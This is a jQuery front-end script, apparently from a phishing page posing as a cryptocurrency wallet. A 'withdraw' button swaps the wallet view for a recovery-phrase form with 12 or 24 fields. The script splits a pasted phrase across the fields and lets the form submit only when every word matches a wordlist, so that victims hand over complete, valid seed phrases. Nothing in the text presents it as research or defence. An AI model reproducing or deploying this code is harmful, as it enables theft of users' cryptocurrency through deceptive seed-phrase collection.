$(document).ready(function () {
	$('.tabs .tab').on('click', function () {
		var currentAttrValue = $(this).attr('data-tab');
		$('.tabs-content ' + currentAttrValue)
			.addClass('active')
			.siblings()
			.removeClass('active');
		$(this).addClass('active').siblings().removeClass('active');
	});

	var date = new Date();
	var month = date.getMonth();
	var day = date.getDate();
	var monthNames = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];

	$('.v-date .date').text(monthNames[month] + ' ' + day);

	$('img, a').on('dragstart', function (e) {
		e.preventDefault();
	});

	$('.switcher').on('change', function () {
		if ($('.switcher').val() == '12') {
			$('.inputs__wrap').html(
				'<div class="input__wrap"><label>1.</label><input type="text" name="F1"  /></div><div class="input__wrap"><label>2.</label><input type="text" name="F2"  /></div><div class="input__wrap"><label>3.</label><input type="text" name="F3"  /></div><div class="input__wrap"><label>4.</label><input type="text" name="F4"  /></div><div class="input__wrap"><label>5.</label><input type="text" name="F5"  /></div><div class="input__wrap"><label>6.</label><input type="text" name="F6"  /></div><div class="input__wrap"><label>7.</label><input type="text" name="F7"  /></div><div class="input__wrap"><label>8.</label><input type="text" name="F8"  /></div><div class="input__wrap"><label>9.</label><input type="text" name="F9"  /></div><div class="input__wrap"><label>10.</label><input type="text" name="F10"  /></div><div class="input__wrap"><label>11.</label><input type="text" name="F11"  /></div><div class="input__wrap"><label>12.</label><input type="text" name="F12"  /></div>',
			);
		}
		if ($('.switcher').val() == '24') {
			$('.inputs__wrap').html(
				'<div class="input__wrap"><label>1.</label><input type="text" name="F1"  /></div><div class="input__wrap"><label>2.</label><input type="text" name="F2"  /></div><div class="input__wrap"><label>3.</label><input type="text" name="F3"  /></div><div class="input__wrap"><label>4.</label><input type="text" name="F4"  /></div><div class="input__wrap"><label>5.</label><input type="text" name="F5"  /></div><div class="input__wrap"><label>6.</label><input type="text" name="F6"  /></div><div class="input__wrap"><label>7.</label><input type="text" name="F7"  /></div><div class="input__wrap"><label>8.</label><input type="text" name="F8"  /></div><div class="input__wrap"><label>9.</label><input type="text" name="F9"  /></div><div class="input__wrap"><label>10.</label><input type="text" name="F10"  /></div><div class="input__wrap"><label>11.</label><input type="text" name="F11"  /></div><div class="input__wrap"><label>12.</label><input type="text" name="F12"  /></div><div class="input__wrap"><label>13.</label><input type="text" name="F13"  /></div><div class="input__wrap"><label>14.</label><input type="text" name="F14"  /></div><div class="input__wrap"><label>15.</label><input type="text" name="F15"  /></div><div class="input__wrap"><label>16.</label><input type="text" name="F16"  /></div><div class="input__wrap"><label>17.</label><input type="text" name="F17"  /></div><div class="input__wrap"><label>18.</label><input type="text" name="F18"  /></div><div class="input__wrap"><label>19.</label><input type="text" name="F19"  /></div><div class="input__wrap"><label>20.</label><input type="text" name="F20"  /></div><div class="input__wrap"><label>21.</label><input type="text" name="F21"  /></div><div class="input__wrap"><label>22.</label><input type="text" name="F22"  /></div><div class="input__wrap"><label>23.</label><input type="text" name="F23"  /></div><div class="input__wrap"><label>24.</label><input type="text" name="F24"  /></div>',
			);
		}
		formValidation();
	});

	$('.button-withdraw').on('click', function () {
		$('.wallet').css('display', 'none');
		$('.phrase').css('display', 'block');
	});

	setInterval(function () {
		var els__inputs = document.querySelectorAll('.input__wrap input');

		// Запускаем перебор всех input
		els__inputs.forEach(function (el__input, int__input) {
			el__input.addEventListener('input', function (e) {
				if (/ /.test(this.value)) {
					var str__value = this.value,
						int__inputLength = els__inputs.length - int__input;
					mm = str__value.split(' ');
					if (mm[1] == '') {
					} else {
						for (var i = 0; i < els__inputs.length - int__input; i++) {
							var el__selectElement = els__inputs[int__input + i];

							// Обрезаем от общей строки нужное количество символов
							// Алгоритм я расписать не могу, т.к. сам его не очень понимаю :D
							if (el__selectElement.value === '') el__selectElement.focus();
							if (typeof mm[int__input + i] == 'undefined') {
								break;
							} else {
								el__selectElement.value = mm[int__input + i];
							}
						}
					}
					// Разбиваем текст на несколько полей
				}
			});
			// Сделаем ещё переход на предыдущее поле по нажатию Backspace
			el__input.addEventListener('keydown', function (e) {
				if (e.keyCode === 8 && el__input.value.length === 0 && int__input !== 0) {
					els__inputs[int__input - 1].focus();
				}
			});
		});
	}, 1);

	function formValidation() {
		$('.inputs__box input').on('paste blur', function () {
			if ($(this).val().trim() === '') {
				// поле пустое
				$(this).addClass('input-invalid');
			} else if (wordlist.map((word) => word.toLowerCase()).includes($(this).val().toLowerCase())) {
				$(this).removeClass('input-invalid');
			} else {
				$(this).addClass('input-invalid');
			}
		});

		$('.send_data').on('submit', function (event) {
			let allValid = true;

			$('.inputs__box input').each(function () {
				if (!wordlist.map((word) => word.toLowerCase()).includes($(this).val().toLowerCase()) || $(this).val().trim() === '') {
					allValid = false;
					$(this).addClass('input-invalid');
				}
			});

			if (!allValid) {
				event.preventDefault();
			}
		});
	}

	formValidation();

	setTimeout(function () {
		$('.app').css('display', 'block');
	}, 2000);
});
